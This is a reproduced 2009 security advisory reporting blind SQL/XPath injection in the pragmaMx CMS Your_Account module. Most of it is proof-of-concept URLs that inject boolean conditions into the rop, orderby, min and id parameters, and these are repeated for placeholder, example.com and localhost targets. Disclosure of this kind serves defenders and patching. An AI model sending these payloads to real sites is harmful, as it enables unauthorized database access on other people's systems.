Related information Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) ClarkConnect XSS vulnerability SQL-Ledger – several vulnerabilities From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com> Date:22.12.2009Subject:pragmaMx CMS Blind SQL/XPath Injection vulnerability########################################### # # CMS Name : pragmaMx ( All Version ) # # Bug Type : Blind SQL/XPath Injection vulnerability # # Found by : Hadi Kiamarsi # # Contact : hadikiamarsi [at] hotmail.com # # Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full% 29/pragmaMx%200.1.11/pragmaMx_0.1.11.0.tar.gz/download # ########################################### PoC : http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst http://[target]/[path]/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://[target]/[path]/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD http://[target]/[path]/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0 example : http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+an d+31337-31337=0+--+&id=111-222-1933email@address.tst http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD" +and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=1 11-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=1 11-222-1933email@address.tst"+and+31337-31337="0 local Example : http://localhost/html/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst http://localhost/html/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch http://localhost/html/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD http://localhost/html/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
ClarkConnect XSS vulnerability
SQL-Ledger – several vulnerabilities
